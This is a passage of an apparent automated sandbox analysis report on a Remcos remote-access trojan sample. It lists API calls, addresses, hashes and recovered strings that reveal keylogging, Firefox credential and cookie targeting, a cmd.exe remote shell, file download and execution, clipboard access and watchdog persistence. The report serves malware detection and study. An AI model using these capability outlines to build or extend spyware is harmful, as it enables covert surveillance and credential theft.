                                                                                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                                                            • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                                                          • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                                                                          • API String ID: 1529173511-1365410817
                                                                                          • Opcode ID: 41e97e648275280d3dddb753ada466f004951c110e7e909b6851935f8b62d148
                                                                                          • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                                                                          • Opcode Fuzzy Hash: 41e97e648275280d3dddb753ada466f004951c110e7e909b6851935f8b62d148
                                                                                          • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                                                                          • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                                                                          • closesocket.WS2_32(?), ref: 00404E3A
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                                                                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 3658366068-0
                                                                                          • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                                                                          • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                                                                          • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                                                                          • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                                                                          Control-flow Graph: function 4457a9-44582d (basic-block graph rendered as a figure in the original report; API calls are listed below)
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                                                                          • _free.LIBCMT ref: 004457E3
                                                                                          • _free.LIBCMT ref: 0044580A
                                                                                          • SetLastError.KERNEL32(00000000), ref: 00445817
                                                                                          • SetLastError.KERNEL32(00000000), ref: 00445820
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                                          • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                                                                          • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                                          • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

                                                                                          Control-flow Graph: function 445a95-445b0f (basic-block graph rendered as a figure in the original report; API calls are listed below)
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                                                                          • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                          • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                                                                          • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                          • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

                                                                                          Control-flow Graph: function 4459f9-445a94 (basic-block graph rendered as a figure in the original report; API calls are listed below)
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                          • String ID:
                                                                                          • API String ID: 2279764990-0
                                                                                          • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                                                                          • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                                                                                          • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                                                                                          • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

                                                                                          Control-flow Graph: function 40163e-401693 (basic-block graph rendered as a figure in the original report; no API calls recorded)
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                          • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                                                                          • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                                                                          • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                                                                                          Control-flow Graph: function 443005-443061 (basic-block graph rendered as a figure in the original report; API calls are listed below)
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                          • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                                                                                          • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                                                                                          • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

                                                                                          Control-flow Graph: function 443649-443696 (basic-block graph rendered as a figure in the original report; API calls are listed below)
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                          • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                                                                          • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                                                                          • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                                                            • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                                            • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                                                            • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                          • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                                                                          • API String ID: 3018269243-1736093966
                                                                                          • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                                                                          • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                                                                          • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                                                                          • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                                                            • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                                                                            • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                                                                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                                                                            • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                                                                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                            • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                                                            • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040768E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                          • API String ID: 1385304114-1507758755
                                                                                          • Opcode ID: ed344af3b2e5fd50c32de0d2071b22cf1c649447e88408241c6b1e9951d97ab2
                                                                                          • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                                                                          • Opcode Fuzzy Hash: ed344af3b2e5fd50c32de0d2071b22cf1c649447e88408241c6b1e9951d97ab2
                                                                                          • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 004056C6
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • __Init_thread_footer.LIBCMT ref: 00405703
                                                                                          • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                                                                          • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                                                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                                                                          • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                                                                          • CloseHandle.KERNEL32 ref: 00405A03
                                                                                          • CloseHandle.KERNEL32 ref: 00405A0B
                                                                                          • CloseHandle.KERNEL32 ref: 00405A1D
                                                                                          • CloseHandle.KERNEL32 ref: 00405A25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                          • String ID: SystemDrive$cmd.exe
                                                                                          • API String ID: 2994406822-3633465311
                                                                                          • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                                                                          • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                                                                          • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                                                                          • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
• FindClose.KERNEL32(00000000), ref: 0040AB0A
• FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
• FindClose.KERNEL32(00000000), ref: 0040AC53
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
• FindClose.KERNEL32(00000000), ref: 0040AD0A
• FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
• FindClose.KERNEL32(00000000), ref: 0040ADF0
• FindClose.KERNEL32(00000000), ref: 0040AE11
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
APIs
• OpenClipboard.USER32 ref: 00414EC2
• EmptyClipboard.USER32 ref: 00414ED0
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
• GlobalLock.KERNEL32(00000000), ref: 00414EF9
• GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
• SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
• CloseClipboard.USER32 ref: 00414F55
• OpenClipboard.USER32 ref: 00414F5C
• GetClipboardData.USER32(0000000D), ref: 00414F6C
• GlobalLock.KERNEL32(00000000), ref: 00414F75
• GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
• CloseClipboard.USER32 ref: 00414F84
  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
• GetLastError.KERNEL32 ref: 00418771
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
• FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
• FindClose.KERNEL32(00000000), ref: 0040B3BE
• FindClose.KERNEL32(00000000), ref: 0040B3E9
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
• GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
• FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
• FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
APIs
  • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
• SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
• GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
• SetLastError.KERNEL32(0000000E), ref: 0041082E
  • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
• GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
• HeapAlloc.KERNEL32(00000000), ref: 0041087C
• SetLastError.KERNEL32(0000045A), ref: 0041098F
  • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
  • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID: $.F
• API String ID: 3950776272-1421728423
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
• SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
• GetLastError.KERNEL32 ref: 00409375
  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
• TranslateMessage.USER32(?), ref: 004093D2
• DispatchMessageA.USER32(?), ref: 004093DD
Strings
• Keylogger initialization failure: error , xrefs: 00409389
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
• GetProcAddress.KERNEL32(00000000), ref: 00412CC1
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
APIs
  • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
  • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
  • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
• Sleep.KERNEL32(00000BB8), ref: 0040E243
• ExitProcess.KERNEL32 ref: 0040E2B4
Memory Dump Source
• Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 3.8.0 Pro$override$pth_unenc$!G
• API String ID: 2281282204-1386060931
                                                                                          • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                                                                          • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                                                                          • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
